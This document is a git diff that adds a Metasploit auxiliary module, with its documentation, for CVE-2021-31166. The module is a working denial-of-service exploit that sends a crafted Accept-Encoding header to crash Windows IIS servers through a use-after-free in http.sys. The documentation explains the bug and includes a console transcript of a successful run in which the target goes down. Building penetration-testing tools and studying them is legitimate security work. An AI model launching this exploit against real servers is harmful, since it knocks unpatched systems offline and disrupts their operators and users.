diff --git a/documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md b/documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md new file mode 100644 index 000000000000..6aba2f72b700 --- /dev/null +++ b/documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md @@ -0,0 +1,108 @@ +## Vulnerable Application +Windows 10 and Windows Server version 20H2 and 2004 servers who do not +have KB5003173 installed to address CVE-2021-31166 are affected. + +The vulnerability occurs due to a use-after-free (UAF) bug in `http.sys`'s `UlpParseContentCoding` +function whereby a local `LIST_ENTRY` item has items appended to it but the `LIST_ENTRY` structure +is not `NULL`'d out after it finished being used. An attacker can abuse this to trigger a code path +that free's every entry of the local `LIST_ENTRY` structure, which will be linked to in the `Request` +object this function uses to handle the incoming request. The `Request` object will then be used later +on in the code resulting in a UAF vulnerability. + +Note that whilst this exploit tries to target IIS servers, in theory any +component that uses `http.sys` could be vulnerable, including client programs +which use `http.sys` to connect to servers. + +The module itself will use this vulnerability to cause a invalid memory access exception error in `http.sys` +by sending a request with a specially crafted `Accept-Encoding` header to the target IIS server. Since +`http.sys` is a kernel module, this will result in a BSOD on the target system. This will cause IIS to go down +for a period of time until the server reboots and IIS restarts again. + +## Verification Steps +1. Start `msfconsole` +1. `use exploit/windows/iis/http_sys_accept_encoding_dos_cve_2021_31166` +1. `set RHOST ` +1. `exploit` +1. **Verify** that the target server is down. + +## Options + +### RHOST + + - **Required** + - Type: **address** + - *No default value* + +IP address or hostname of the target IIS server. + +### RPORT + + - **Required** + - Type: **integer** + - Default value: **80** + +The port on the target server where IIS is running. + +### TARGETURI + + - **Optional** + - Type: **string** + - Default value: **/** + +The base URL of the IIS install on the target server. + +## Scenarios + +### Windows 10 20H2 Build 19042.685 With IIS Installed +```text + ~/git/metasploit-framework │ iis_dos_cve2022_21907 ?18 ./msfconsole + +IIIIII dTb.dTb _.---._ + II 4' v 'B .'"".'/|\`.""'. + II 6. .P : .' / | \ `. : + II 'T;. .;P' '.' / | \ `.' + II 'T; ;P' `. / | \ .' +IIIIII 'YvP' `-.__|__.-' + +I love shells --egypt + + + =[ metasploit v6.1.34-dev-88b17b79fe ] ++ -- --=[ 2209 exploits - 1171 auxiliary - 395 post ] ++ -- --=[ 600 payloads - 45 encoders - 11 nops ] ++ -- --=[ 9 evasion ] + +Metasploit tip: You can use help to view all +available commands + +[*] Starting persistent handler(s)... +msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options +Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:hos + t:port][...] + RHOSTS yes The target host(s), see https://github.com/rapid + 7/metasploit-framework/wiki/Using-Metasploit + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The URI of the IIS Server. + VHOST no HTTP server virtual host + +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > set RHOSTS 172.22.216.145 +RHOSTS => 172.22.216.145 +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > exploit +[*] Running module against 172.22.216.145 + +[*] Connecting to target to make sure its alive... +[+] Successfully connected to target. Sending payload... +[+] Payload was sent to the target server. +[*] Checking that the server is down... +[+] Target is down. +[*] Auxiliary module execution completed +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > +``` + +![Metasploit demonstration](https://mauricelambert.github.io/vulnerability/images/CVE-2021-31166_demo.gif "Metasploit demonstration") diff --git a/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb b/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb new file mode 100644 index 000000000000..e6b62478d0bb --- /dev/null +++ b/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows IIS HTTP Protocol Stack DOS', + 'Description' => %q{ + This module exploits CVE-2021-31166, a UAF bug in http.sys + when parsing specially crafted Accept-Encoding headers + that was patched by Microsoft in May 2021, on vulnerable + IIS servers. Successful exploitation will result in + the target computer BSOD'ing before subsequently rebooting. + Note that the target IIS server may or may not come back up, + this depends on the target's settings as to whether IIS + is configured to start on reboot. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Max', # Aka @_mxms. Vulnerability discovery + 'Stefan Blair', # Aka @fzzyhd1. Vulnerability discovery + 'Axel Souchet', # Aka @0vercl0k. PoC exploit + 'Maurice LAMBERT ' # msf module + ], + 'Platform' => 'win', + 'References' => [ + ['CVE', '2021-31166'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31166'], + ['URL', 'https://github.com/mauricelambert/CVE-2021-31166'], + ['URL', 'https://twitter.com/metr0/status/1392631376592076805'], + ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166'] + ], + 'DisclosureDate' => '2021-05-11', + 'Notes' => { + 'Stability' => [CRASH_OS_RESTARTS], + 'Reliability' => [IOC_IN_LOGS], + 'SideEffects' => [SCREEN_EFFECTS] + } + ) + ) + + register_options( + [ + OptString.new( + 'TARGETURI', [true, 'The URI of the IIS Server.', '/'] + ) + ] + ) + end + + # This module performs a DOS attack using a simple HTTP request. + def run + print_status('Connecting to target to make sure its alive...') + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, ''), + 'method' => 'GET' + ) + + if res.nil? + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the target IIS server - no response") + end + + print_good('Successfully connected to target. Sending payload...') + + payload = + "#{Rex::Text.rand_text_alpha(5)}, #{Rex::Text.rand_text_alpha(3)}, ," + + exploit_headers = { + 'Accept-Encoding' => payload + } + + begin + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, ''), + 'timeout' => 1, # short timeout -> the server should not respond + 'method' => 'GET', + 'headers' => exploit_headers + }) + rescue Rex::ConnectionError, Errno::ECONNRESET + print_good('Connection reset by target server or connection failed when sending the malicious payload!') + ensure + print_good('Payload was sent to the target server.') + print_status('Checking that the server is down...') + end + + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, ''), + 'method' => 'GET' + ) + + if res.nil? + print_good('Target is down.') + else + print_error('Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.') + end + rescue Rex::ConnectionError, Errno::ECONNRESET + print_good('Target is down.') + end + end +end